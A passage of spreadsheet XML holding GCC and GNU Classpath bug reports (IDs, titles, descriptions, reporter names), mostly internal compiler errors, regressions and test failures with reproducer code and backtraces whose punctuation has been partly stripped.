test_gomp_2.c:10: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [test_gomp] Error 1
int main(void) {
  int iijj
  float a=1.0 b
#pragma omp parallel for schedule(guided1) private(jj)
  for ( ii = 1  ii &lt;= 9  ii++ ) {
    for ( jj = 1  jj &lt;= 9  jj++ ) {
      a = b
    }
  }
}</t>
  </si>
  <si>
    <t>GCC-79758</t>
  </si>
  <si>
    <t>ICE: tree check: expected class 'type' have 'exceptional' (error_mark) in store_parm_decls_oldstyle at c/c-decl.c:8973</t>
  </si>
  <si>
    <t>With invalid code on x86_64 GNU/Linux down to at least 4.8
(configured with --enable-checking=yes) :
$ cat z1.c
void fn1 (int[a]) { }
void fn1 (b) { }
$ gcc-7-20170226 -c z1.c
z1.c:1:15: error: 'a' undeclared here (not in a function)
 void fn1 (int[a]) { }
               ^
z1.c: In function 'fn1':
z1.c:1:14: error: parameter name omitted
 void fn1 (int[a]) { }
              ^
z1.c: At top level:
z1.c:2:6: error: redefinition of 'fn1'
 void fn1 (b) { }
      ^~~
z1.c:1:6: note: previous definition of 'fn1' was here
 void fn1 (int[a]) { }
      ^~~
z1.c: In function 'fn1':
z1.c:2:6: warning: type of 'b' defaults to 'int' [-Wimplicit-int]
 void fn1 (b) { }
      ^~~
z1.c:2:1: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in store_parm_decls_oldstyle at c/c-decl.c:8973
 void fn1 (b) { }
 ^~~~
0xea3607 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc/tree.c:9866
0x672ead tree_class_check(tree_node* tree_code_class char const* int char const*)
        ../../gcc/tree.h:3187
0x672ead store_parm_decls_oldstyle
        ../../gcc/c/c-decl.c:8973
0x672ead store_parm_decls()
        ../../gcc/c/c-decl.c:9147
0x6d05af c_parser_declaration_or_fndef
        ../../gcc/c/c-parser.c:2074
0x6d87fb c_parser_external_declaration
        ../../gcc/c/c-parser.c:1468
0x6d9259 c_parser_translation_unit
        ../../gcc/c/c-parser.c:1348
0x6d9259 c_parse_file()
        ../../gcc/c/c-parser.c:18173
0x737b02 c_common_parse_file()
        ../../gcc/c-family/c-opts.c:1107</t>
  </si>
  <si>
    <t>GCC-6886</t>
  </si>
  <si>
    <t>bit vector iterator uses wrong 1 constant</t>
  </si>
  <si>
    <t xml:space="preserve">
The stl bitvector implementation contains in both the iterator and
const_iterator implementation the code:
  reference operator*() const { return reference(_M_p 1U &lt;&lt; _M_offset) }
Since the bit_type is an unsigned long it should be 1UL here.
I have attached a testcase exhibiting the problem and a fix in 
the Fix section.
Ciao Marcus
Release:
3.1 20020410 (prerelease)
Environment:
System: Linux gershwin 2.4.18-SMP #1 SMP Mon May 13 09:48:57 UTC 2002 x86_64 unknown
Architecture: x86_64
host: x86_64-unknown-linux-gnu
build: x86_64-unknown-linux-gnu
target: x86_64-unknown-linux-gnu
configured with: /home/hammer/gcc/configure --prefix=/usr --host=x86_64-unknown-linux --build=x86_64-unknown-linux --libdir=/usr/lib64 --enable-languages=cc++ --enable-threads=posix --disable-nls
How-To-Repeat:
#include 
#include 
typedef std::vector bvec
int
main() {
	int	i num = 0
	bvec v
	v.resize(66)
	for (i = 0  i &lt; 66  i++)
		v[i] = 0
	v[1]	= 1
	v[33]	= 1
	v[49]	= 1
	v[65]	= 1
	for (bvec::iterator j = v.begin()  j &lt; v.end()  j++) {
		if (bool(*j)) num++
	}
	assert (num == 4)
	return 0
}</t>
  </si>
  <si>
    <t>GCC-39423</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] [SH]  performance regression: lost mov @(dispRn)</t>
  </si>
  <si>
    <t>GCC-64693</t>
  </si>
  <si>
    <t>[5 Regression] PCH failed with --with-build-config=bootstrap-lto</t>
  </si>
  <si>
    <t>On Linux/x86-64 r216320 configured with
--prefix=/usr/5.0.0 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --with-build-config=bootstrap-lto --disable-werror --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc
and built with make -j8 profiledbootstra gave many PCH failures:
https://gcc.gnu.org/ml/gcc-regression/2014-10/msg00392.html
r216301 is OK.  r219883 still has those failures:
https://gcc.gnu.org/ml/gcc-testresults/2015-01/msg02251.html</t>
  </si>
  <si>
    <t>GCC-12926</t>
  </si>
  <si>
    <t>[3.3 regression] Wrong value after assignment in initialize list using bit-fields</t>
  </si>
  <si>
    <t>In the example below GCC seems to have problems with assignment 
of types in the initialize list which were declared using Bit Fields:
#include 
using namespace std
struct A 
{
  enum Type {P U S}
  A( const size_t size const Type type ): mSize(size) mType(type)
  {
    cout &lt;&lt; type =  &lt;&lt; type &lt;&lt; endl
    cout &lt;&lt; mType =  &lt;&lt; mType &lt;&lt; endl
  }
  const size_t mSize :CHAR_BIT*sizeof(size_t) - 3 	
  Type mType       : 2
} 
int main()
{
  A testa(2A::S) 
  return testa.mType
}
The output is:
type = 2
mType = 0
Note that the output after compiling with -O1 is correct:
type = 2
mType = 2
 with -O2 or -O3 it is wrong.
Release:
gcc version 3.3.2
Environment:
sparc-sun-solaris2.7
Verbose message g++:
g++ a.C -v -oa -O3 -m64
Reading specs from /sw/gcc3/lib/gcc-lib/sparc-sun-solaris2.7/3.3.2/specs
Configured with: ../gcc-3.3.2/configure --prefix=/sw/gcc3 --with-local-
prefix=/sw/local --enable-libgcj --with-ld=/usr/ccs/bin/ld --with-
as=/usr/ccs/bin/as
Thread model: posix
gcc version 3.3.2
 /sw/gcc3/lib/gcc-lib/sparc-sun-solaris2.7/3.3.2/cc1plus -quiet -v -
D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=2 -Dsparc -D__sparc__ -
D__sparc -D__arch64__ -Acpu=sparc64 -Amachine=sparcv9 -D__sparcv9 a.C -
D__GNUG__=3 -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet -dumpbase a.C -
m64 -auxbase a -O3 -version -o /var/tmp//ccnuC6vI.s
GNU C++ version 3.3.2 (sparc-sun-solaris2.7)
        compiled by GNU C version 3.3.2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /sw/gcc3/sparc-sun-solaris2.7/include
#include ... search starts here:
#include  search starts here:
 /sw/gcc3/include/c++/3.3.2
 /sw/gcc3/include/c++/3.3.2/sparc-sun-solaris2.7
 /sw/gcc3/include/c++/3.3.2/backward
 /sw/local/include
 /sw/gcc3/include
 /sw/gcc3/lib/gcc-lib/sparc-sun-solaris2.7/3.3.2/include
 /usr/include
End of search list.
 /usr/ccs/bin/as -V -Qy -s -xarch=v9 -
o /var/tmp//ccu1ZhGI.o /var/tmp//ccnuC6vI.s
/usr/ccs/bin/as: Sun WorkShop 6 99/08/18
 /sw/gcc3/lib/gcc-lib/sparc-sun-solaris2.7/3.3.2/collect2 -V -Y 
P/usr/lib/sparcv9 -Qy -oa /sw/gcc3/lib/gcc-lib/sparc-sun-
solaris2.7/3.3.2/sparcv9/crt1.o /sw/gcc3/lib/gcc-lib/sparc-sun-
solaris2.7/3.3.2/sparcv9/crti.o /usr/ccs/lib/sparcv9/values-
Xa.o /sw/gcc3/lib/gcc-lib/sparc-sun-solaris2.7/3.3.2/sparcv9/crtbegin.o -
L/sw/gcc3/lib/gcc-lib/sparc-sun-solaris2.7/3.3.2/sparcv9 -L/sw/gcc3/lib/gcc-
lib/sparc-sun-solaris2.7/3.3.2 -L/sw/gcc3/lib/gcc-lib/sparc-sun-
solaris2.7/3.3.2/../../../../sparc-sun-solaris2.7/lib -L/usr/ccs/bin/sparcv9 -
L/usr/ccs/bin -L/usr/ccs/lib/sparcv9 -L/usr/ccs/lib -L/sw/gcc3/lib/gcc-
lib/sparc-sun-solaris2.7/3.3.2/../../../sparcv9 -L/sw/gcc3/lib/gcc-lib/sparc-
sun-solaris2.7/3.3.2/../../.. -L/lib/sparcv9 -
L/usr/lib/sparcv9 /var/tmp//ccu1ZhGI.o -lstdc++ -lm -lgcc_s_sparcv9 -lgcc -lc -
lgcc_s_sparcv9 -lgcc -lc /sw/gcc3/lib/gcc-lib/sparc-sun-
solaris2.7/3.3.2/sparcv9/crtend.o /sw/gcc3/lib/gcc-lib/sparc-sun-
solaris2.7/3.3.2/sparcv9/crtn.o
ld: Software Generation Utilities - Solaris Link Editors: 5.8-1.279</t>
  </si>
  <si>
    <t>bjoern.seebeck</t>
  </si>
  <si>
    <t>GCC-44185</t>
  </si>
  <si>
    <t>[4.6 regression] New prefetch test failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 159516 gave:
FAIL: gcc.dg/tree-ssa/prefetch-6.c scan-assembler-times prefetcht 5
FAIL: gcc.dg/tree-ssa/prefetch-6.c scan-tree-dump-times aprefetch Issued prefetch 5
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-assembler-times mfence 2
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-assembler-times movnti 2
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-assembler-times prefetchnta 2
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-assembler-times prefetcht 1
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-assembler-times prefetchw 5
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-tree-dump-times aprefetch Issued nontemporal prefetch 3
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-tree-dump-times aprefetch Issued prefetch 5
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-tree-dump-times aprefetch a nontemporal store 2
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-tree-dump-times optimized ={nt} 2
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-tree-dump-times optimized __builtin_ia32_mfence 2
FAIL: gcc.dg/tree-ssa/prefetch-7.c scan-tree-dump-times optimized builtin_prefetch 8
Revision 159511 is OK.  Revisions 159514/159515:
http://gcc.gnu.org/ml/gcc-cvs/2010-05/msg00566.html
http://gcc.gnu.org/ml/gcc-cvs/2010-05/msg00567.html
may be the cause.</t>
  </si>
  <si>
    <t>GCC-33406</t>
  </si>
  <si>
    <t>[4.3 Regression] At revision 128385 Bootstraping PPC Darwin still fail in Java</t>
  </si>
  <si>
    <t>The bootstrap failure reported in http://gcc.gnu.org/ml/gcc/2007-09/msg00147.html is still present in revision 128385.</t>
  </si>
  <si>
    <t>GCC-67722</t>
  </si>
  <si>
    <t>Misplaced #endif in libgo/runtime/lfstack.goc</t>
  </si>
  <si>
    <t>libgo fails to build on illumos. Here is a trivial patch:
Index: gcc-5/src/libgo/runtime/lfstack.goc
===================================================================
--- gcc-5.orig/src/libgo/runtime/lfstack.goc
+++ gcc-5/src/libgo/runtime/lfstack.goc
@@ -297 +296 @@ static inline LFNode* lfUnpack(uint64 va
 // So we use 17msb of pointers as ABA counter.
 #   define PTR_BITS 47
 #  endif
-# endif
 # define CNT_BITS (64 - PTR_BITS + 3)
 static inline uint64 lfPack(LFNode *node uintptr cnt) {
 	return ((uint64)(node)&lt;&lt;(64-PTR_BITS)) | (cnt
@@ -376 +367 @@ static inline uint64 lfPack(LFNode *node
 static inline LFNode* lfUnpack(uint64 val) {
 	return (LFNode*)((val &gt;&gt; CNT_BITS) &lt;&lt; 3)
 }
+# endif /* __sparc__ ... */
 #else
 static inline uint64 lfPack(LFNode *node uintptr cnt) {
 	return ((uint64)(uintptr)(node)&lt;&lt;32) | cnt</t>
  </si>
  <si>
    <t>pashev.igor</t>
  </si>
  <si>
    <t>CLASSPATH-34991</t>
  </si>
  <si>
    <t>java.awt.Graphics2D.drawPolyline(int[] xs int[] ys int n) draws one more line</t>
  </si>
  <si>
    <t>The java.awt.Graphics2D.drawPolyline connects the first point with the last one so it works as drawPolygon should work.
This code demonstrates the problem:
import java.awt.Graphics
import javax.swing.JComponent
import javax.swing.JFrame
public class C extends JFrame{
	public static void main(String[] args)
	{
		C c= new C()
		c.setVisible(true)
		c.setSize(200200)
		JComponent cmp=new JComponent(){
			private static final long serialVersionUID = 1L
			@Override
			public void paint(Graphics g) {
				int n=3
				int[] xs=new int[n]
				int[] ys=new int[n]
				xs[0]=100
				ys[0]=100
				xs[1]=150
				ys[1]=100
				xs[2]=150
				ys[2]=150
				g.drawPolyline(xs ys n)
			}
			}
		c.add(cmp)
	}
}</t>
  </si>
  <si>
    <t>asch</t>
  </si>
  <si>
    <t>GCC-64734</t>
  </si>
  <si>
    <t>[4.9/5 Regression] ICE at omp lowering</t>
  </si>
  <si>
    <t>Created attachment 34533
test case
gcc version: 5.0.0 / svn : r220005
gcc -Wall -fopenmp -o bug-5 bug-5.c
bug-5.c: In function â€˜mainâ€™:
bug-5.c:5:10: warning: unused variable â€˜tidâ€™ [-Wunused-variable]
   int x tid[32]
          ^
bug-5.c:5:7: warning: unused variable â€˜xâ€™ [-Wunused-variable]
   int x tid[32]
       ^
bug-5.c:7:9: internal compiler error: Segmentation fault
 #pragma omp target data map (to:tid[0:32]) map (to:x)
         ^
0xac672f crash_signal
        /home/mentor/gomp/trunk/gcc/toplev.c:381
0x9b676b build_sender_ref
        /home/mentor/gomp/trunk/gcc/omp-low.c:1220
0x9e533c lower_omp_target
        /home/mentor/gomp/trunk/gcc/omp-low.c:11406
0x9dc271 lower_omp_1
        /home/mentor/gomp/trunk/gcc/omp-low.c:11765
0x9dc271 lower_omp
        /home/mentor/gomp/trunk/gcc/omp-low.c:11853
0x9dc0dd lower_omp_1
        /home/mentor/gomp/trunk/gcc/omp-low.c:11697
0x9dc0dd lower_omp
        /home/mentor/gomp/trunk/gcc/omp-low.c:11853
0x9dcdcd lower_omp_1
        /home/mentor/gomp/trunk/gcc/omp-low.c:11706
0x9dcdcd lower_omp
        /home/mentor/gomp/trunk/gcc/omp-low.c:11853
0x9dcdcd lower_omp_1
        /home/mentor/gomp/trunk/gcc/omp-low.c:11706
0x9dcdcd lower_omp
        /home/mentor/gomp/trunk/gcc/omp-low.c:11853
0x9ded9c execute_lower_omp
        /home/mentor/gomp/trunk/gcc/omp-low.c:11891
0x9ded9c execute
        /home/mentor/gomp/trunk/gcc/omp-low.c:11928</t>
  </si>
  <si>
    <t>u17263</t>
  </si>
  <si>
    <t>GCC-65602</t>
  </si>
  <si>
    <t>gcc.target/i386/mpx tests FAIL</t>
  </si>
  <si>
    <t>Many of the new gcc.target/i386/mpx tests FAIL on Solaris/x86 with gas causing
enormous amounts of testsuite noise.  The failures fall into two categories:
FAIL: gcc.target/i386/mpx/alloca-1-lbv.c   -O0  (test for excess errors)
Excess errors:
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/i386/mpx/alloca-1-lbv.c:19:21: warning: implicit declaration of function 'alloca' [-Wimplicit-function-declaration]
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/i386/mpx/alloca-1-lbv.c:19:21: warning: incompatible implicit declaration of built-in function 'alloca'
It seems the tests should simply use __builtin_alloca instead.
FAIL: gcc.target/i386/mpx/calloc-1-lbv.c   -O0  (test for excess errors)
Excess errors:
Undefined                       first referenced
 symbol                             in file
__mpx_wrapper_calloc                /var/tmp//ccEYaOnw.o
ld: fatal: symbol referencing errors
WARNING: gcc.target/i386/mpx/calloc-1-lbv.c   -O0  compilation failed to produce executable
All link tests will fail on all non-Linux targets since only those provide the
MPX runtime libraries. The check_effective_target_mpx test in gcc.target/i386/mpx/mpx.exp is incomplete it seems.  IMO the test should be fixed rather
than hardcoding Linux/x86 here which will start to become wrong once non-Linux
targets start to support MPX.
  Rainer</t>
  </si>
  <si>
    <t>GCC-69029</t>
  </si>
  <si>
    <t>[6 Regression] bogus -Wmisleading-indentation warning on one-line loops</t>
  </si>
  <si>
    <t>markus@x4 tmp % cat while.cpp
int main() {
  int i = 0
  do i++ while (i &lt; 3)
}
markus@x4 tmp % g++ -Wall -c while.cpp
while.cpp: In function â€˜int main()â€™:
while.cpp:3:11: warning: statement is indented as if it were guarded by... [-Wmisleading-indentation]
   do i++ while (i &lt; 3)
           ^~~~~
while.cpp:3:3: note: ...this â€˜doâ€™ clause but it is not
   do i++ while (i &lt; 3)
   ^~</t>
  </si>
  <si>
    <t>GCC-1586</t>
  </si>
  <si>
    <t>linux build problem for libjava - cpplib (?)</t>
  </si>
  <si>
    <t xml:space="preserve">        I'm unable to build the current cvs source configured for gcj. The option -Wp-MD.deps/prims.pp is misinterpeted.
Release:
2.97 20010108 (experimental)
Environment:
System: Linux robyn 2.4.0-test11 #1 Wed Dec 6 20:52:57 CET 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/softlab/robyn/Linux/epkg/gcc-20010105 --enable-threads=posix --enable-shared --enable-languages=c++java --disable-new-gxx-abi --with-gnu-as --with-gnu-ld
How-To-Repeat:
        make bootstrap
[...]
cc1plus: Unrecognized option `-MD'
cc1plus: Output filename specified twice
make[3]: *** [prims.lo] Error 1
make[3]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/softlab/robyn/src/gcc/build/i686-pc-linux-gnu/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/softlab/robyn/src/gcc/build'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>patha</t>
  </si>
  <si>
    <t>GCC-1614</t>
  </si>
  <si>
    <t>Internal compiler error in `output_die' at dwarf2out.c:5426</t>
  </si>
  <si>
    <t>Compiler dies and requests that I submit a bug report. (here it is)
The output:
../mpeglib/mpegvideoscan.h:43: Internal compiler error in `output_die' at dwarf2out.c:5426
Please submit a full bug report.
See  for instructions.
It seems to crash on combining '-O4' and '-ggdb' when combining
this file for ALL my other sourcefiles this does work...
I hope I have provided what you need
I tried to follow the instructions...
Release:
gcc version 2.95.2 19991024 (release)
Environment:
i386-redhat-linux
How-To-Repeat:
g++ -O4 -ggdb -c show.ii</t>
  </si>
  <si>
    <t>alexb</t>
  </si>
  <si>
    <t>GCC-47398</t>
  </si>
  <si>
    <t>[4.5 Regression] tree check: accessed elt 10 of tree_vec with 9 elts in tsubst at cp/pt.c:10500</t>
  </si>
  <si>
    <t>Created attachment 23063
rh670984.C
On the attached testcase g++ 4.5 and 4.6 ICE with:
rh670984.C:168:5: internal compiler error: tree check: accessed elt 10 of tree_vec with 9 elts in tsubst at cp/pt.c:10500
(different line number in 4.5 of course).
4.4 compiles it without errors.</t>
  </si>
  <si>
    <t>GCC-53756</t>
  </si>
  <si>
    <t>[C++1y] ICE: in gen_type_die_with_usage at dwarf2out.c:18774 with -g and operator auto ()</t>
  </si>
  <si>
    <t>Created attachment 27691
reduced testcase
Compiler output:
$ gcc -std=c++1y -g testcase.C 
testcase.C:1:8: internal compiler error: in gen_type_die_with_usage at dwarf2out.c:18774
 struct A
        ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x139e8a0 /mnt/svn/gcc-trunk/gcc/dwarf2out.c line=18774 function=0x139c740 gen_type_die_with_usage)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:1010
#1  0x00000000008bc1da in gen_type_die_with_usage (type=0x7ffff6c29000 context_die=0x7ffff6ad4050 usage=DINFO_USAGE_DIR_USE)
    at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:18774
#2  0x00000000008b9796 in gen_decl_die (decl=0x7ffff6c17500 origin=0x7ffff6c15dc8 context_die=0x7ffff6ad4050)
    at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:19275
#3  0x00000000008bb105 in gen_member_die (context_die=0x7ffff6ad4050 type=0x7ffff6c15dc8) at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:18334
#4  gen_struct_or_union_type_die (usage= context_die= type=0x7ffff6c15dc8)
    at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:18407
#5  gen_tagged_type_die (usage= context_die=0x7ffff6ad4000 type=0x7ffff6c15dc8) at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:18597
#6  gen_tagged_type_die (type=0x7ffff6c15dc8 context_die= usage=) at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:18540
#7  0x00000000008bc43d in gen_type_die_with_usage (type=0x7ffff6c15dc8 context_die=0x7ffff6ad4000 usage=DINFO_USAGE_DIR_USE)
    at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:18744
#8  0x00000000008b99de in gen_decl_die (decl=0x7ffff6c12958 origin= context_die=0x7ffff6ad4000)
    at /mnt/svn/gcc-trunk/gcc/dwarf2out.c:19314
#9  0x0000000000aa03d9 in rest_of_type_compilation (type=0x7ffff6c15dc8 toplev=1) at /mnt/svn/gcc-trunk/gcc/passes.c:219
#10 0x00000000006611b6 in finish_struct_1 (t=0x7ffff6c15dc8) at /mnt/svn/gcc-trunk/gcc/cp/class.c:6180
#11 0x0000000000662aed in finish_struct (t=0x7ffff6c15dc8 attributes=0x0) at /mnt/svn/gcc-trunk/gcc/cp/class.c:6329
#12 0x000000000068c184 in cp_parser_class_specifier_1 (parser=0x7ffff6c27948) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:18031
#13 0x000000000068eaa7 in cp_parser_class_specifier (parser=0x7ffff6c27948) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:18234
#14 cp_parser_type_specifier (parser=0x7ffff6c27948 flags= decl_specs=0x7fffffffd3e0 is_declaration= 
    declares_class_or_enum=0x7fffffffd35c is_cv_qualifier=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:13386
#15 0x000000000069ddbe in cp_parser_decl_specifier_seq (parser=0x7ffff6c27948 flags=1 decl_specs=0x7fffffffd3e0 
    declares_class_or_enum=0x7fffffffd3dc) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:10730
#16 0x00000000006a670a in cp_parser_simple_declaration (parser=0x7ffff6c27948 function_definition_allowed_p=true maybe_range_for_decl=0x0)
    at /mnt/svn/gcc-trunk/gcc/cp/parser.c:10373
#17 0x00000000006907c8 in cp_parser_block_declaration (statement_p=false parser=0x7ffff6c27948) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:10322
#18 cp_parser_block_declaration (parser=0x7ffff6c27948 statement_p=) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:10247
#19 0x00000000006b139c in cp_parser_declaration (parser=0x7ffff6c27948) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:10218
#20 0x00000000006b1698 in cp_parser_declaration_seq_opt (parser=0x7ffff6c27948) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:10104
#21 0x00000000006b1da3 in cp_parser_translation_unit (parser=0x7ffff6c27948) at /mnt/svn/gcc-trunk/gcc/cp/parser.c:3754
#22 c_parse_file () at /mnt/svn/gcc-trunk/gcc/cp/parser.c:27578
#23 0x00000000007b2e95 in c_common_parse_file () at /mnt/svn/gcc-trunk/gcc/c-family/c-opts.c:1137
#24 0x0000000000b8d58c in compile_file () at /mnt/svn/gcc-trunk/gcc/toplev.c:550
#25 0x0000000000b8f178 in do_compile () at /mnt/svn/gcc-trunk/gcc/toplev.c:1867
#26 toplev_main (argc=15 argv=0x7fffffffd708) at /mnt/svn/gcc-trunk/gcc/toplev.c:1943
#27 0x00007ffff6f052ad in __libc_start_main () from /lib64/libc.so.6
#28 0x00000000005927f1 in _start ()
Tested revisions:
r188906 - crash</t>
  </si>
  <si>
    <t>GCC-57688</t>
  </si>
  <si>
    <t>[4.9 Regression] -O3 -march=native generates illegal opcode on AMD Phenom</t>
  </si>
  <si>
    <t>Created attachment 30347
C++ source code
I just noticed that -march=native support broke from
date 20130621 to 20130623 for AMD Phenom as follows
[dcb@localhost foundBugs]$ ../results/bin/g++ -g -O3 -Wall bug113.cc
[dcb@localhost foundBugs]$ ./a.out
Time for caxpy1 = 0.16 seconds [5120 Mflops]
[dcb@localhost foundBugs]$ ../results/bin/g++ -g -O3 -march=native -Wall bug113.cc
[dcb@localhost foundBugs]$ ./a.out
Illegal instruction (core dumped)
[dcb@localhost foundBugs]$
Valgrind helps out with this
vex amd64-&gt;IR: unhandled instruction bytes: 0x8F 0xEA 0xF8 0x10 0xD2 0x2 0x1E 0x0
vex amd64-&gt;IR:   REX=0 REX.W=0 REX.R=0 REX.X=0 REX.B=0
vex amd64-&gt;IR:   VEX=0 VEX.L=0 VEX.nVVVV=0x0 ESC=NONE
vex amd64-&gt;IR:   PFX.66=0 PFX.F2=0 PFX.F3=0
==23912== valgrind: Unrecognised instruction at address 0x4045e2.
==23912==    at 0x4045E2: caxpy3(Vector&amp; Vector&amp; Complex) (bug113.cc:52)
==23912==    by 0x4012C0: main (bug113.cc:258)
==23912== Your program just tried to execute an instruction that Valgrind
==23912== did not recognise.  There are two possible reasons for this.
==23912== 1. Your program has a bug and erroneously jumped to a non-code
==23912==    location.  If you are running Memcheck and you just saw a
==23912==    warning about a bad jump it's probably your program's fault.
==23912== 2. The instruction is legitimate but Valgrind doesn't handle it
==23912==    i.e. it's Valgrind's fault.  If you think this is the case or
==23912==    you are not sure please let us know and we'll try to fix it.
==23912== Either way Valgrind will now raise a SIGILL signal which will
==23912== probably kill your program.
==23912==
==23912== Process terminating with default action of signal 4 (SIGILL)
==23912==  Illegal opcode at address 0x4045E2
==23912==    at 0x4045E2: caxpy3(Vector&amp; Vector&amp; Complex) (bug113.cc:52)
Also
[dcb@localhost foundBugs]$ head /proc/cpuinfo
processor   : 0
vendor_id   : AuthenticAMD
cpu family  : 16
model       : 4
model name  : AMD Phenom(tm) II X4 970 Processor
stepping    : 3
microcode   : 0x10000c8
cpu MHz     : 3500.000
cache size  : 512 KB
physical id : 0</t>
  </si>
  <si>
    <t>GCC-15636</t>
  </si>
  <si>
    <t>error generated by gfortran attempting to compile BLAS libraries (crotg.f)</t>
  </si>
  <si>
    <t>I recently experienced a problem with the latest version of gfortran in 
attempting to compile the BLAS library portion of the latest version of LAPACK 
(lapack.tgz from http://www.netlib.org/lapack/).  I've attached the source file 
that generated the error although I could find no associated *.i* file to also 
attach.
GCC -
[root@mordy SRC]# gfortran -v
Reading specs from /usr/local/gfortran-static/bin/../lib/gcc/i386-pc-linux-
gnu/3.5-tree-ssa/specs
Configured with: ../gcc/configure --prefix=/tmp/gfortran-static --enable-
languages=cf95 --host=i386-pc-linux-gnu --target=i386-pc-linux-gnu
Thread model: posix
gcc version 3.5-tree-ssa 20030920 (merged 20030817)
System -
Red Hat Linux 8 (2.4.20-8)
Pentium III (Katmai)
Compiler options -
gfortran  -funroll-all-loops -O3 -x f95 -save-temps -c crotg.f
Compiler output -
[root@mordy LAPACK]# make blaslib
( cd BLAS/SRC make )
make[1]: Entering directory `/usr/local/LAPACK/BLAS/SRC'
ar cr ../../blas_LINUX.a isamax.o sasum.o saxpy.o scopy.o sdot.o snrm2.o srot.o 
srotg.o sscal.o sswap.o lsame.o xerbla.o \
sgemv.o sgbmv.o ssymv.o ssbmv.o sspmv.o strmv.o stbmv.o stpmv.o strsv.o stbsv.o 
stpsv.o sger.o ssyr.o sspr.o ssyr2.o sspr2.o sgemm.o ssymm.o ssyrk.o ssyr2k.o 
strmm.o strsm.o 
ranlib ../../blas_LINUX.a
ar cr ../../blas_LINUX.a idamax.o dasum.o daxpy.o dcopy.o ddot.o dnrm2.o drot.o 
drotg.o dscal.o dswap.o lsame.o xerbla.o \
dgemv.o dgbmv.o dsymv.o dsbmv.o dspmv.o dtrmv.o dtbmv.o dtpmv.o dtrsv.o dtbsv.o 
dtpsv.o dger.o dsyr.o dspr.o dsyr2.o dspr2.o dgemm.o dsymm.o dsyrk.o dsyr2k.o 
dtrmm.o dtrsm.o
ranlib ../../blas_LINUX.a
gfortran  -funroll-all-loops -O3 -x f95 -save-temps -c crotg.f
crotg.f: In function `crotg':
crotg.f:19: internal compiler error: in get_value at tree-ssa-ccp.c:1516
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[1]: *** [crotg.o] Error 1
make[1]: Leaving directory `/usr/local/LAPACK/BLAS/SRC'
make: *** [blaslib] Error 2
The source for crotg.f is below:
      subroutine crotg(cacbcs)
      complex cacbs
      real c
      real normscale
      complex alpha
      if (cabs(ca) .ne. 0.) go to 10
         c = 0.
         s = (1.0.)
         ca = cb
         go to 20
   10 continue
         scale = cabs(ca) + cabs(cb)
         norm = scale * sqrt((cabs(ca/scale))**2 + (cabs(cb/scale))**2)
         alpha = ca /cabs(ca)
         c = cabs(ca) / norm
         s = alpha * conjg(cb) / norm
         ca = alpha * norm
   20 continue
      return
      end</t>
  </si>
  <si>
    <t>dtucker</t>
  </si>
  <si>
    <t>GCC-50795</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/tree-ssa/builtin-expect-[1234].c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 180114 gave
FAIL: gcc.dg/tree-ssa/builtin-expect-1.c scan-tree-dump-times gimple builtin_expect[^\n]* 0\)\n[^\n]*if 2
FAIL: gcc.dg/tree-ssa/builtin-expect-2.c scan-tree-dump-times gimple builtin_expect[^\n]* 0\)\n[^\n]*if 2
FAIL: gcc.dg/tree-ssa/builtin-expect-3.c scan-tree-dump-times gimple builtin_expect[^\n]* 0\)\n[^\n]*if 2
FAIL: gcc.dg/tree-ssa/builtin-expect-4.c scan-tree-dump-times gimple builtin_expect[^\n]* 0\)\n[^\n]*if 2
Revision 180105 is OK.</t>
  </si>
  <si>
    <t>GCC-69092</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] basic_string constructor and throwing iterators</t>
  </si>
  <si>
